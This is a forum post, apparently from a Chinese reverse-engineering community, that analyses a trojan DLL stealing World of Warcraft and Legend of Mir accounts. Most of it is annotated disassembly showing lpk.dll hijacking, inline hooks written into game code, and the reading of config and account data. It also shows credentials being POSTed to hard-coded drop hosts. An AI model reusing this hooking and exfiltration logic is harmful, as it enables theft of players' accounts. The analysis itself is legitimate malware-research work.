10009328 |. B8 0C290000 mov eax, 290C
1000932D |. E8 EEAC0000 call 10014020
10009332 |. A1 60B00210 mov eax, dword ptr [1002B060]
10009337 |. 33C5 xor eax, ebp
10009339 |. 8945 FC mov [local.1], eax
1000933C |. 53 push ebx
1000933D |. 56 push esi
1000933E |. 57 push edi
1000933F |. BE 00280000 mov esi, 2800
10009344 |. 56 push esi
10009345 |. 33DB xor ebx, ebx
10009347 |. 8D85 FCD6FFFF lea eax, [local.2625]
1000934D |. 53 push ebx
1000934E |. 50 push eax
1000934F |. E8 DC890000 call <清理一块内存空间出来>
10009354 |. 68 00010000 push 100
10009359 |. 8D85 FCFEFFFF lea eax, [local.65]
1000935F |. 53 push ebx
10009360 |. 50 push eax
10009361 |. E8 CA890000 call <清理一块内存空间出来>
10009366 |. 68 20030000 push 320
1000936B |. 53 push ebx
1000936C |. BF 28F40210 mov edi, 1002F428
10009371 |. 57 push edi
10009372 |. E8 B9890000 call <清理一块内存空间出来>
10009377 |. 68 F8120310 push 100312F8 ; ASCII "d41d8cd98f00b204e9800998ecf8427e"
1000937C |. 68 E0C10210 push 1002C1E0 ; ASCII "c06a104c7ee76da815861809b2cf7925"
10009381 |. 8D85 FCFEFFFF lea eax, [local.65]
10009387 |. 68 1C3B0210 push 10023B1C ; d=bb&bbe=%s&bb=%s&yx=wow
1000938C |. 50 push eax
1000938D |. E8 34A40000 call <字符处理函数>
10009392 |. 56 push esi
10009393 |. 8D85 FCD6FFFF lea eax, [local.2625]
10009399 |. 50 push eax
1000939A |. 8D85 FCFEFFFF lea eax, [local.65]
100093A0 |. 50 push eax
100093A1 |. 68 B0290210 push 100229B0 ; oa/css/img/www.asp
100093A6 |. 6A 50 push 50
100093A8 |. 68 9C290210 push 1002299C ; www.zjdasheng.com
100093AD |. E8 E88EFFFF call 1000229A ; 网络连接
100093B2 |. 8D85 FCD6FFFF lea eax, [local.2625]
100093B8 |. 83C4 4C add esp, 4C
100093BB |. 50 push eax
100093BC |. E8 94870100 call 10021B55
100093C1 |. C70424 F4010000 mov dword ptr [esp], 1F4
100093C8 |. FF15 7CDD0210 call dword ptr [1002DD7C] ; kernel32.Sleep
100093CE |. BE 70360210 mov esi, 10023670 ; star:
100093D3 |. 8D85 FCD6FFFF lea eax, [local.2625]
100093D9 |. 56 push esi
100093DA |. 50 push eax
100093DB |. E8 60A30000 call <比较cmp>
100093E0 |. 59 pop ecx
100093E1 |. 59 pop ecx
100093E2 |. 85C0 test eax, eax
100093E4 |. 0F84 DB010000 je 100095C5
100093EA |. 8D85 FCD6FFFF lea eax, [local.2625]
100093F0 |. 68 DC340210 push 100234DC ; okok:
100093F5 |. 50 push eax
100093F6 |. E8 45A30000 call <比较cmp>
100093FB |. 59 pop ecx
100093FC |. 59 pop ecx
100093FD |. 85C0 test eax, eax
100093FF |. 0F84 C0010000 je 100095C5
10009405 |. 8D85 FCD6FFFF lea eax, [local.2625]
1000940B |. 68 DC340210 push 100234DC ; okok:
10009410 |. 50 push eax
10009411 |. E8 2AA30000 call <比较cmp>
10009416 |. 8818 mov byte ptr [eax], bl
10009418 |. 8D85 FCD6FFFF lea eax, [local.2625]
1000941E |. 56 push esi
1000941F |. 50 push eax
10009420 |. E8 1BA30000 call <比较cmp>
10009425 |. 8D70 05 lea esi, dword ptr [eax+5]
10009428 |. 6A 3B push 3B
1000942A |. 56 push esi
1000942B |. E8 50A20000 call 10013680
10009430 |. 83C4 18 add esp, 18
10009433 |. 85C0 test eax, eax
10009435 |. 74 41 je short 10009478
10009437 |. 89BD F8D6FFFF mov [local.2626], edi
1000943D |> 6A 3B /push 3B
1000943F |. 56 |push esi
10009440 |. E8 3BA20000 |call 10013680
10009445 |. 6A 13 |push 13
10009447 |. 56 |push esi
10009448 |. FFB5 F8D6FFFF |push [local.2626]
1000944E |. 8985 F4D6FFFF |mov [local.2627], eax
10009454 |. 8818 |mov byte ptr [eax], bl
10009456 |. E8 E5A40000 |call <获取当前文件路径>
1000945B |. 8BB5 F4D6FFFF |mov esi, [local.2627]
10009461 |. 8385 F8D6FFFF 1>|add [local.2626], 14
10009468 |. 46 |inc esi
10009469 |. 6A 3B |push 3B
1000946B |. 56 |push esi
1000946C |. E8 0FA20000 |call 10013680
10009471 |. 83C4 1C |add esp, 1C
10009474 |. 85C0 |test eax, eax
10009476 |.^ 75 C5 \jnz short 1000943D
10009478 |> 6A 10 push 10
1000947A |. 5E pop esi
1000947B |. 56 push esi
1000947C |. 53 push ebx
1000947D |. 57 push edi
1000947E |. E8 BEC00000 call <搜索特征码>
10009483 |. 83C4 0C add esp, 0C
10009486 |. 85C0 test eax, eax
10009488 |. 0F84 37010000 je 100095C5
1000948E |. 56 push esi
1000948F |. 53 push ebx
10009490 |. 68 3CF40210 push 1002F43C
10009495 |. E8 A7C00000 call <搜索特征码>
1000949A |. 83C4 0C add esp, 0C
1000949D |. 85C0 test eax, eax
1000949F |. 0F84 20010000 je 100095C5
100094A5 |. 56 push esi
100094A6 |. 53 push ebx
100094A7 |. 68 C8F40210 push 1002F4C8
100094AC |. E8 90C00000 call <搜索特征码>
100094B1 |. 56 push esi
100094B2 |. 53 push ebx
100094B3 |. 68 64F40210 push 1002F464
100094B8 |. A3 34170310 mov dword ptr [10031734], eax
100094BD |. E8 7FC00000 call <搜索特征码>
100094C2 |. 56 push esi
100094C3 |. 53 push ebx
100094C4 |. 68 04F50210 push 1002F504
100094C9 |. A3 38170310 mov dword ptr [10031738], eax
100094CE |. E8 6EC00000 call <搜索特征码>
100094D3 |. 83C4 24 add esp, 24
100094D6 |. 50 push eax
100094D7 |. 68 5C020310 push 1003025C
100094DC |. 68 AE620010 push 100062AE
100094E1 |. 56 push esi
100094E2 |. 53 push ebx
100094E3 |. 68 F0F40210 push 1002F4F0
100094E8 |. E8 54C00000 call <搜索特征码>
100094ED |. 83C4 0C add esp, 0C
100094F0 |. 50 push eax
100094F1 |. 56 push esi
100094F2 |. 53 push ebx
100094F3 |. 68 DCF40210 push 1002F4DC
100094F8 |. E8 44C00000 call <搜索特征码>
100094FD |. 83C4 0C add esp, 0C
10009500 |. 50 push eax
10009501 |. E8 F97DFFFF call <计算hook点> //hook 函数
10009506 |. 56 push esi
10009507 |. 53 push ebx
10009508 |. 68 50F40210 push 1002F450
1000950D |. E8 2FC00000 call <搜索特征码>
10009512 |. 83C4 20 add esp, 20
10009515 |. 50 push eax
10009516 |. 68 20140310 push 10031420
1000951B |. 68 CA660010 push 100066CA
10009520 |. 56 push esi
10009521 |. 53 push ebx
10009522 |. 68 3CF40210 push 1002F43C
10009527 |. E8 15C00000 call <搜索特征码>
1000952C |. 83C4 0C add esp, 0C
1000952F |. 50 push eax
10009530 |. 56 push esi
10009531 |. 53 push ebx
10009532 |. 57 push edi
10009533 |. E8 09C00000 call <搜索特征码>
10009538 |. 83C4 0C add esp, 0C
1000953B |. 50 push eax
1000953C |. E8 BE7DFFFF call <计算hook点>
10009541 |. 56 push esi
10009542 |. 53 push ebx
10009543 |. 68 B4F40210 push 1002F4B4
10009548 |. E8 F4BF0000 call <搜索特征码>
1000954D |. 83C4 20 add esp, 20
10009550 |. 50 push eax
10009551 |. 68 1CC40210 push 1002C41C
10009556 |. 68 1D680010 push 1000681D
1000955B |. 56 push esi
1000955C |. 53 push ebx
1000955D |. 68 A0F40210 push 1002F4A0
10009562 |. E8 DABF0000 call <搜索特征码>
10009567 |. 83C4 0C add esp, 0C
1000956A |. 50 push eax
1000956B |. 56 push esi
1000956C |. 53 push ebx
1000956D |. 68 8CF40210 push 1002F48C
10009572 |. E8 CABF0000 call <搜索特征码>
10009577 |. 83C4 0C add esp, 0C
1000957A |. 50 push eax
1000957B |. E8 7F7DFFFF call <计算hook点>
10009580 |. 6A 14 push 14
10009582 |. 53 push ebx
10009583 |. BE 48140310 mov esi, 10031448
10009588 |. 56 push esi
10009589 |. 891D 4C170310 mov dword ptr [1003174C], ebx
1000958F |. 891D 44170310 mov dword ptr [10031744], ebx
10009595 |. 891D 24170310 mov dword ptr [10031724], ebx
1000959B |. E8 90870000 call <清理一块内存空间出来>
100095A0 |. 68 78F40210 push 1002F478
100095A5 |. 56 push esi
100095A6 |. E8 C5A40000 call 10013A70
100095AB |. 83C4 28 add esp, 28
100095AE |. 53 push ebx ; /pThreadId
100095AF |. 53 push ebx ; |CreationFlags
100095B0 |. 53 push ebx ; |pThreadParm
100095B1 |. 68 BE910010 push 100091BE ; |ThreadFunction = 4bf3db98.100091BE
100095B6 |. 53 push ebx ; |StackSize
100095B7 |. 53 push ebx ; |pSecurity
100095B8 |. FF15 94200210 call dword ptr [10022094] ; \CreateThread 线程6
100095BE |. 50 push eax ; /hObject
100095BF |. FF15 90200210 call dword ptr [10022090] ; \CloseHandle
100095C5 |> 8B4D FC mov ecx, [local.1]
100095C8 |. 5F pop edi
100095C9 |. 5E pop esi
100095CA |. 33CD xor ecx, ebp
100095CC |. 5B pop ebx
100095CD |. E8 78A20000 call 1001384A
100095D2 |. C9 leave
100095D3 \. C3 retn
线程6 判断传奇
100091BE /. 55 push ebp
100091BF |. 8BEC mov ebp, esp
100091C1 |. 83EC 10 sub esp, 10
100091C4 |. 56 push esi
100091C5 |. 68 4C3A0210 push 10023A4C ; mir.exeyx=ftp&ss=%s
100091CA |. BE 50C50210 mov esi, 1002C550 ; d:\tools\ollyice\loaddll.exe
100091CF |. 56 push esi
100091D0 |. E8 6BA50000 call <比较cmp>
100091D5 |. 59 pop ecx
100091D6 |. 59 pop ecx
100091D7 |. 85C0 test eax, eax
100091D9 |. 74 05 je short 100091E0
100091DB |. E8 1BFFFFFF call 100090FB
100091E0 |> 68 D03A0210 push 10023AD0 ; wow.exews2_32.dll
100091E5 |. 56 push esi
100091E6 |. E8 55A50000 call <比较cmp>
100091EB |. 59 pop ecx
100091EC |. 59 pop ecx
100091ED |. 85C0 test eax, eax
100091EF |. 74 05 je short 100091F6
100091F1 |. E8 05FFFFFF call 100090FB
100091F6 |> 68 403A0210 push 10023A40 ; mir1.dat
100091FB |. 56 push esi
100091FC |. E8 3FA50000 call <比较cmp>
10009201 |. 59 pop ecx
10009202 |. 59 pop ecx
10009203 |. 85C0 test eax, eax
10009205 |. 75 37 jnz short 1000923E
10009207 |. 68 343A0210 push 10023A34 ; mir2.dat
Hook函数:
100012FF <4bf3db9>/$ 55 push ebp
10001300 |. 8BEC mov ebp, esp
10001302 |. 51 push ecx
10001303 |. 51 push ecx
10001304 |. 57 push edi
10001305 |. 8B7D 08 mov edi, [arg.1]
10001308 |. 85FF test edi, edi
1000130A |. 75 07 jnz short 10001313
1000130C |. 32C0 xor al, al
1000130E |. E9 E2000000 jmp 100013F5
......
10001338 |. 51 push ecx ; /pOldProtect
10001339 |. 6A 40 push 40 ; |NewProtect = PAGE_EXECUTE_READWRITE
1000133B |. 6A 0B push 0B ; |Size = B (11.)
1000133D |. 897E 12 mov dword ptr [esi+12], edi ; |
10001340 |. 8B3D 30200210 mov edi, dword ptr [10022030] ; |kernel32.GetCurrentProcess
10001346 |. 50 push eax ; |Address
10001347 |. 8946 23 mov dword ptr [esi+23], eax ; |
1000134A |. C646 0C 00 mov byte ptr [esi+C], 0 ; |
1000134E |. FFD7 call edi ; |[GetCurrentProcess
10001350 |. 8B1D 2C200210 mov ebx, dword ptr [1002202C] ; |kernel32.VirtualProtectEx
10001356 |. 50 push eax ; |hProcess
10001357 |. FFD3 call ebx ; \VirtualProtectEx 去保护
10001359 |. 6A 0B push 0B
1000135B |. FF75 0C push [arg.2]
1000135E |. 56 push esi
1000135F |. E8 4C0A0100 call 10011DB0
10001364 |. 6A 0B push 0B
10001366 |. 68 90000000 push 90
1000136B |. FF75 0C push [arg.2]
1000136E |. E8 BD090100 call <清理一块内存空间出来>
10001373 |. 0FB645 18 movzx eax, byte ptr [ebp+18]
10001377 |. 50 push eax
10001378 |. FF75 08 push [arg.1]
1000137B |. 8945 F8 mov [local.2], eax
1000137E |. FF75 0C push [arg.2]
10001381 |. E8 2A0A0100 call 10011DB0
10001386 |. 8B4D 0C mov ecx, [arg.2]
10001389 |. 8B55 08 mov edx, [arg.1]
1000138C |. 8B45 F8 mov eax, [local.2]
1000138F |. 2BD1 sub edx, ecx 两个地址相减
10001391 |. 83C4 24 add esp, 24
10001394 |. 83EA 05 sub edx, 5 ; 计算hook跳转的值
10001397 |. C60408 E9 mov byte ptr [eax+ecx], 0E9
1000139B |. 895408 01 mov dword ptr [eax+ecx+1], edx
1000139F |. 8D45 FC lea eax, [local.1]
100013A2 |. 50 push eax
100013A3 |. FF75 FC push [local.1]
100013A6 |. 6A 0B push 0B
100013A8 |. 51 push ecx
100013A9 |. FFD7 call edi
Hook了游戏后,从游戏模块jmp过来
100062AE 60 db 60 ; CHAR '`'
100062AF . E8 D0FFFFFF call 10006284
100062B4 . 61 popad
10006284 /$ 33C0 xor eax, eax
10006286 |. 40 inc eax
10006287 |. 3905 44170310 cmp dword ptr [10031744], eax
1000628D |. 74 1E je short 100062AD
1000628F |. A3 44170310 mov dword ptr [10031744], eax
10006294 |. 33C0 xor eax, eax
10006296 |. 50 push eax
10006297 |. 50 push eax
10006298 |. 50 push eax
10006299 |. 68 68600010 push 10006068 //线程 5 读取魔兽游戏信息
1000629E |. 50 push eax
1000629F |. 50 push eax
100062A0 |. FF15 5CC70210 call dword ptr [1002C75C]
100062A6 |. 50 push eax
100062A7 |. FF15 8C100310 call dword ptr [1003108C]
100062AD \> C3 retn
线程 5:
10006068 /. 55 push ebp
10006069 |. 8BEC mov ebp, esp
1000606B |. 81EC 340D0000 sub esp, 0D34
10006071 |. A1 60B00210 mov eax, dword ptr [1002B060]
10006076 |. 33C5 xor eax, ebp
10006078 |. 8945 FC mov [local.1], eax
1000607B |. 53 push ebx
1000607C |. 56 push esi
1000607D |. 57 push edi
1000607E |. BE 000C0000 mov esi, 0C00
10006083 |. 56 push esi
10006084 |. 33DB xor ebx, ebx
10006086 |. 8D85 CCF2FFFF lea eax, [local.845]
1000608C |. 53 push ebx
1000608D |. 50 push eax
1000608E |. E8 9DBC0000 call <清理一块内存空间出来>
10006093 |. 68 04290210 push 10022904 ; rb
10006098 |. 68 6C350210 push 1002356C ; WTF\Config.wtf
1000609D |. E8 5DDF0000 call 10013FFF ; 读取游戏服务器信息
100060A2 |. 8BF8 mov edi, eax
100060A4 |. 83C4 14 add esp, 14
100060A7 |. 3BFB cmp edi, ebx
100060A9 |. 0F84 C6010000 je 10006275
100060AF |. 57 push edi
100060B0 |. 6A 01 push 1
100060B2 |. 8D85 CCF2FFFF lea eax, [local.845]
100060B8 |. 56 push esi
100060B9 |. 50 push eax
100060BA |. E8 67DE0000 call 10013F26
.......
10006239 |. E8 32D80000 call 10013A70
1000623E |. 8D85 64FFFFFF lea eax, [local.39]
10006244 |. 50 push eax
10006245 |. 57 push edi
10006246 |. E8 25D80000 call 10013A70
1000624B |. 83C4 28 add esp, 28
1000624E |. E8 EFFBFFFF call 10005E42 关键call 函数里面会判断是联盟还是部落
10006253 |> 33DB xor ebx, ebx
10006255 |> 833D 70170310 0>cmp dword ptr [10031770], 1
1000625C |. 75 17 jnz short 10006275
1000625E |. 53 push ebx
1000625F |. 53 push ebx
10006260 |. 53 push ebx
10006261 |. 68 60570010 push 10005760 线程6
10006266 |. 53 push ebx
10006267 |. 53 push ebx
10006268 |. FF15 5CC70210 call dword ptr [1002C75C]
1000626E |. 50 push eax
1000626F |. FF15 8C100310 call dword ptr [1003108C]
10006275 |> 8B4D FC mov ecx, [local.1]
10006278 |. 5F pop edi
10006279 |. 5E pop esi
1000627A |. 33CD xor ecx, ebp
1000627C |. 5B pop ebx
1000627D |. E8 C8D50000 call 1001384A
10006282 |. C9 leave
10006283 \. C3 retn
线程6:会发送消息给魔兽世界窗口消息,猜测还会使用炉石回去。
10005760 /. 55 push ebp
10005761 |. 8BEC mov ebp, esp
10005763 |. B8 342D0000 mov eax, 2D34
10005768 |. E8 B3E80000 call 10014020
1000576D |. A1 60B00210 mov eax, dword ptr [1002B060]
10005772 |. 33C5 xor eax, ebp
10005774 |. 8945 FC mov [local.1], eax
10005777 |. 53 push ebx
10005778 |. 56 push esi
10005779 |. 57 push edi
1000577A |. 68 20140310 push 10031420
1000577F |. E8 D3B9FFFF call 10001157
10005784 |. C70424 F4010000 mov dword ptr [esp], 1F4
1000578B |. FF15 7CDD0210 call dword ptr [1002DD7C]
10005791 |. 68 00140000 push 1400
10005796 |. 33FF xor edi, edi
10005798 |. 57 push edi
10005799 |. BE 78C80210 mov esi, 1002C878
1000579E |. 56 push esi
1000579F |. C705 50170310 0>mov dword ptr [10031750], 2
100057A9 |. E8 82C50000 call <清理一块内存空间出来>
100057AE |. 68 B0340210 push 100234B0 ; /script ToggleBag(0);ToggleBag(0);
100057B3 |. 56 push esi
100057B4 |. E8 B7E20000 call 10013A70
100057B9 |. 8B35 BC210210 mov esi, dword ptr [100221BC] ; user32.SendMessageA
100057BF |. 83C4 14 add esp, 14
100057C2 |. 57 push edi ; /lParam
100057C3 |. 6A 0D push 0D ; |wParam = D
100057C5 |. BB 00010000 mov ebx, 100 ; |
100057CA |. 53 push ebx ; |Message => WM_KEYDOWN
100057CB |. FF35 44C40210 push dword ptr [1002C444] ; |hWnd = NULL
100057D1 |. FFD6 call esi ; \SendMessageA
100057D3 |. 57 push edi ; /lParam
100057D4 |. 6A 0D push 0D ; |wParam = D
100057D6 |. 8D7B 01 lea edi, dword ptr [ebx+1] ; |
100057D9 |. 57 push edi ; |Message => WM_KEYUP
100057DA |. FF35 44C40210 push dword ptr [1002C444] ; |hWnd = NULL
100057E0 |. FFD6 call esi ; \SendMessageA
.......
10005B1B |. 68 54340210 push 10023454 ; /cast Hearthstone
10005B20 |. 68 78C80210 push 1002C878
10005B25 |. E8 46DF0000 call 10013A70
10005B2A |. 68 50340210 push 10023450 ; cn
10005B2F |. 68 58F70210 push 1002F758
10005B34 |. E8 07DC0000 call <比较cmp>
10005B39 |. 83C4 1C add esp, 1C
10005B3C |. 85C0 test eax, eax
10005B3E |. 74 1C je short 10005B5C
10005B40 |. 68 44340210 push 10023444 ; /cast 炉石
10005B45 |. 68 78C80210 push 1002C878
10005B4A |. E8 21DF0000 call 10013A70
10005B4F |. 68 78C80210 push 1002C878
10005B54 |. E8 1FC5FFFF call 10002078
10005B59 |. 83C4 0C add esp, 0C
10005B5C |> 68 40340210 push 10023440 ; tw
这里判断部落还是联盟,读取账号信息
10005C19 |. 68 2C340210 push 1002342C ; %s[lm]
10005C1E |. 50 push eax
10005C1F |. E8 A2DB0000 call <字符处理函数>
10005C24 |. 83C4 0C add esp, 0C
10005C27 |> 833D 3C170310 0>cmp dword ptr [1003173C], 2
10005C2E |. 75 12 jnz short 10005C42
10005C30 |. 56 push esi
10005C31 |. 8D45 AC lea eax, [local.21]
10005C34 |. 68 24340210 push 10023424 ; %s[bl]
10005C39 |. 50 push eax
10005C3A |. E8 87DB0000 call <字符处理函数>
10005C3F |. 83C4 0C add esp, 0C
10005C42 |> 8D85 CCFEFFFF lea eax, [local.77]
10005C48 |. 50 push eax
10005C49 |. 8D45 AC lea eax, [local.21]
10005C4C |. 50 push eax
10005C4D |. E8 DEC4FFFF call 10002130
10005C52 |. 68 50340210 push 10023450 ; cn
10005C57 |. BB 58F70210 mov ebx, 1002F758
10005C5C |. 53 push ebx
10005C5D |. E8 DEDA0000 call <比较cmp>
10005C62 |. 83C4 10 add esp, 10
10005C65 |. BE F8120310 mov esi, 100312F8
10005C6A |. BF 10270000 mov edi, 2710
10005C6F |. 85C0 test eax, eax
10005C71 |. 74 25 je short 10005C98
10005C73 |. A1 68170310 mov eax, dword ptr [10031768]
10005C78 |. 33D2 xor edx, edx
10005C7A |. 8BCF mov ecx, edi
10005C7C |. F7F1 div ecx
10005C7E |. 56 push esi
10005C7F |. 50 push eax
10005C80 |. 8D45 AC lea eax, [local.21]
10005C83 |. 50 push eax
10005C84 |. 8D85 CCFAFFFF lea eax, [local.333]
10005C8A |. 68 00340210 push 10023400 ; wq=0&wf=%s&ws=%d&bb=%s&d=g&yx=wow
10005C8F |. 50 push eax
10005C90 |. E8 31DB0000 call <字符处理函数>
10005C95 |. 83C4 14 add esp, 14
10005C98 |> 68 40340210 push 10023440 ; tw
10005C9D |. 53 push ebx
10005C9E |. E8 9DDA0000 call <比较cmp>
10005CA3 |. 59 pop ecx
10005CA4 |. 59 pop ecx
10005CA5 |. 85C0 test eax, eax
10005CA7 |. 74 25 je short 10005CCE
.......
10005D66 |. 68 54330210 push 10023354 ; wq=0&wf=%s&ws=%d&bb=%s&d=g&yx=wowkr
10005D6B |. 50 push eax
10005D6C |. E8 55DA0000 call <字符处理函数>
10005D71 |. 83C4 14 add esp, 14
10005D74 |> 68 00280000 push 2800
10005D79 |. 8D85 CCD2FFFF lea eax, [local.2893]
10005D7F |. 50 push eax
10005D80 |. 8D85 CCFAFFFF lea eax, [local.333]
10005D86 |. 50 push eax
10005D87 |. 68 38330210 push 10023338 ; Skin/201/Menu/lib/fds.asp
10005D8C |. 6A 50 push 50
10005D8E |. 68 24330210 push 10023324 ; www.5913game.com
10005D93 |. E8 02C5FFFF call 1000229A ; 发送账号信息 关键call
关键call :
1000229A /$ 55 push ebp
1000229B |. 8BEC mov ebp, esp
1000229D |. B8 A8180000 mov eax, 18A8
100022A2 |. E8 791D0100 call 10014020
100022A7 |. A1 60B00210 mov eax, dword ptr [1002B060]
100022AC |. 33C5 xor eax, ebp
....... //处理完数据,然后投递账号信息,完成盗取
1000236B |. 68 38290210 push 10022938 ; POST /%s
10002370 |. 50 push eax
10002371 |. E8 50140100 call <字符处理函数>
10002376 |. 8D85 7CE7FFFF lea eax, [local.1569]
1000237C |. 68 58290210 push 10022958 ; HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nHost:
10002381 |. 50 push eax
10002382 |. E8 F9160100 call 10013A80
10002387 |. FFB5 68E7FFFF push [local.1574]
1000238D |. 8D85 7CE7FFFF lea eax, [local.1569]
10002393 |. 50 push eax
10002394 |. E8 E7160100 call 10013A80
10002399 |. 8D85 7CE7FFFF lea eax, [local.1569]
1000239F |. 68 24290210 push 10022924 ; \r\nConnection: closePOST /%s
100023A4 |. 50 push eax
100023A5 |. E8 D6160100 call 10013A80
100023AA |. 6A 7D push 7D
100023AC |. 8D85 7CFFFFFF lea eax, [local.33]
100023B2 |. 57 push edi
100023B3 |. 50 push eax
100023B4 |. E8 77F90000 call <清理一块内存空间出来>
100023B9 |. 56 push esi
100023BA |. E8 B1170100 call 10013B70
木马针对传奇游戏的操作,这里找了一个跳转点来分析:
100091B1 . 60 pushad
100091B2 . E8 12F1FFFF call 100082C9 关键call
100091B7 . 61 popad
100091B8 . FF25 31020310 jmp dword ptr [10030231]
这个call,是对传奇游戏的操作,没有玩过传奇。有装备解除绑定、庄园之类等等的操作。
100082C9 /$ 55 push ebp
100082CA |. 8BEC mov ebp, esp
100082CC |. 83EC 24 sub esp, 24
100082CF |. A1 60B00210 mov eax, dword ptr [1002B060]
100082D4 |. 33C5 xor eax, ebp
100082D6 |. 8945 FC mov [local.1], eax
100082D9 |. 53 push ebx
100082DA |. 56 push esi
........
100083CC |. 8D46 18 lea eax, dword ptr [esi+18]
100083CF |. 68 B8390210 push 100239B8 ; => huichenm装备成功解除绑定
100083D4 |. 50 push eax
100083D5 |. E8 66B30000 call <比较cmp>
100083DA |. 59 pop ecx
100083DB |. 59 pop ecx
100083DC |. 85C0 test eax, eax
100083DE |. 74 23 je short 10008403
100083E0 |. 53 push ebx
100083E1 |. 53 push ebx
100083E2 |. 53 push ebx
100083E3 |. 68 DF6D0010 push 10006DDF
100083E8 |. 53 push ebx
100083E9 |. 53 push ebx
100083EA |. FF15 5CC70210 call dword ptr [1002C75C]
100083F0 |. 50 push eax
100083F1 |. FF15 8C100310 call dword ptr [1003108C]
100083F7 |. 8B0D 54C60210 mov ecx, dword ptr [1002C654]
100083FD |. 33C0 xor eax, eax
100083FF |. 66:8941 10 mov word ptr [ecx+10], ax
10008403 |> BF AC390210 mov edi, 100239AC ; => zaimam
10008408 |. 8D46 18 lea eax, dword ptr [esi+18]
1000840B |. 57 push edi
1000840C |. 50 push eax
1000840D |. E8 2EB30000 call <比较cmp>
10008412 |. 59 pop ecx
10008413 |. 59 pop ecx
10008414 |. 85C0 test eax, eax
10008416 |. 0F84 EF000000 je 1000850B
1000841C |. 8D46 18 lea eax, dword ptr [esi+18]
1000841F |. 57 push edi
10008420 |. 50 push eax
10008421 |. E8 1AB30000 call <比较cmp>
10008426 |. 59 pop ecx
10008427 |. 59 pop ecx
10008428 |. 68 A0390210 push 100239A0 ; hxlchuaqia
1000842D |. 53 push ebx
1000842E |. 53 push ebx
1000842F |. 8945 DC mov [local.9], eax
10008432 |. FF15 E4C20210 call dword ptr [1002C2E4]
10008438 |. 6A 32 push 32
1000843A |. 53 push ebx
1000843B |. BF C4120310 mov edi, 100312C4
10008440 |. 57 push edi
10008441 |. C705 5C170310 0>mov dword ptr [1003175C], 1
1000844B |. E8 E0980000 call <清理一块内存空间出来>
10008450 |. 6A 03 push 3
10008452 |. 8D46 18 lea eax, dword ptr [esi+18]
........
100084E8 |> \53 push ebx
100084E9 |. 53 push ebx
100084EA |. 53 push ebx
100084EB |. 68 946C0010 push 10006C94 //传奇线程
100084F0 |. 53 push ebx
100084F1 |. 53 push ebx
100084F2 |. FF15 5CC70210 call dword ptr [1002C75C]
100084F8 |. 50 push eax
100084F9 |. FF15 8C100310 call dword ptr [1003108C]
100084FF |. 8B0D 54C60210 mov ecx, dword ptr [1002C654]
10008505 |. 33C0 xor eax, eax
10008507 |. 66:8941 10 mov word ptr [ecx+10], ax
1000850B |> 68 88390210 push 10023988 ; => tuichum
10008510 |. 8D7E 18 lea edi, dword ptr [esi+18]
10008513 |. 57 push edi
10008514 |. E8 27B20000 call <比较cmp>
10008519 |. 59 pop ecx
1000851A |. 59 pop ecx
1000851B |. 85C0 test eax, eax
1000851D |. 74 06 je short 10008525
1000851F |. 53 push ebx
10008520 |. E8 11CD0000 call 10015236
10008525 |> 68 78390210 push 10023978 ; => zhuangyuanm
传奇线程
10006C94 /. 55 push ebp
10006C95 |. 8BEC mov ebp, esp
10006C97 |. 81EC 08010000 sub esp, 108
10006C9D |. A1 60B00210 mov eax, dword ptr [1002B060]
10006CA2 |. 33C5 xor eax, ebp
10006CA4 |. 8945 FC mov [local.1], eax
10006CA7 |. 833D 5C170310 0>cmp dword ptr [1003175C], 0
10006CAE |. 0F84 1F010000 je 10006DD3
10006CB4 |. 53 push ebx
10006CB5 |. 56 push esi
10006CB6 |. E8 59FFFFFF call 10006C14
10006CBB |. BE 00010000 mov esi, 100
10006CC0 |. 56 push esi
10006CC1 |. 8D85 FCFEFFFF lea eax, [local.65]
10006CC7 |. 6A 00 push 0
10006CC9 |. 50 push eax
10006CCA |. C785 F8FEFFFF 0>mov [local.66], 10023700 ; .
10006CD4 |. E8 57B00000 call <清理一块内存空间出来>
10006CD9 |. 83C4 0C add esp, 0C
10006CDC |. FF15 B0110310 call dword ptr [100311B0]
10006CE2 |. 3905 44C40210 cmp dword ptr [1002C444], eax
10006CE8 |. 74 0A je short 10006CF4
10006CEA |. C785 F8FEFFFF F>mov [local.66], 100236F0 ; 切出了游戏.
10006CF4 |> A1 60170310 mov eax, dword ptr [10031760]
10006CF9 |. BB E4360210 mov ebx, 100236E4 ; ,***已绑
10006CFE |. 83F8 01 cmp eax, 1
10006D01 |. 74 06 je short 10006D09
10006D03 |. 8B9D F8FEFFFF mov ebx, [local.66]
10006D09 |> 85C0 test eax, eax
10006D0B |. 75 05 jnz short 10006D12
10006D0D |. BB DC360210 mov ebx, 100236DC ; ,无绑
10006D12 |> 83F8 02 cmp eax, 2
10006D15 |. 75 05 jnz short 10006D1C
10006D17 |. BB D0360210 mov ebx, 100236D0 ; ,人物解绑
10006D1C |> 83F8 03 cmp eax, 3
10006D1F |. 75 05 jnz short 10006D26
10006D21 |. BB C4360210 mov ebx, 100236C4 ; ,装备解绑
10006D26 |> 56 push esi
10006D27 |. 8D85 FCFEFFFF lea eax, [local.65]
10006D2D |. 6A 00 push 0
10006D2F |. 50 push eax
10006D30 |. E8 FBAF0000 call <清理一块内存空间出来>
10006D35 |. FFB5 F8FEFFFF push [local.66]
10006D3B |. A1 F8140310 mov eax, dword ptr [100314F8]
10006D40 |. 53 push ebx
10006D41 |. FF30 push dword ptr [eax]
10006D43 |. A1 B8DF0210 mov eax, dword ptr [1002DFB8]
10006D48 |. FF30 push dword ptr [eax]
10006D4A |. A1 14160310 mov eax, dword ptr [10031614]
10006D4F |. FF30 push dword ptr [eax]
10006D51 |. 8D85 FCFEFFFF lea eax, [local.65]
10006D57 |. FF35 F0150310 push dword ptr [100315F0]
10006D5D |. 68 C4120310 push 100312C4
10006D62 |. 68 A8360210 push 100236A8 ; /%s %s:%d:%d[%d]密保[%s]%s
10006D67 |. 50 push eax
10006D68 |. E8 59CA0000 call <字符处理函数>
样本大致流程:
1、该样本用od加载起来后,会获取自身路径,然后和对应的游戏进程比较。
2、释放动态链接库文件lpk.dll到游戏安装目录下,并设置文件属性为系统隐藏,通过劫持lpk加载。
3、通过挂钩关键函数,patch游戏,读取内存等方式盗取游戏账号密码。
4、将盗取信息发送到指定网址
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
赞赏
- [原创]找了一个有样本的木马下载者分析 2232
- [原创][原创]工作中分析木马的一些心得 2496
- [原创]一个下载着分析 2736
- [原创]一个木马分析,请大家多多指教,提高分析 7236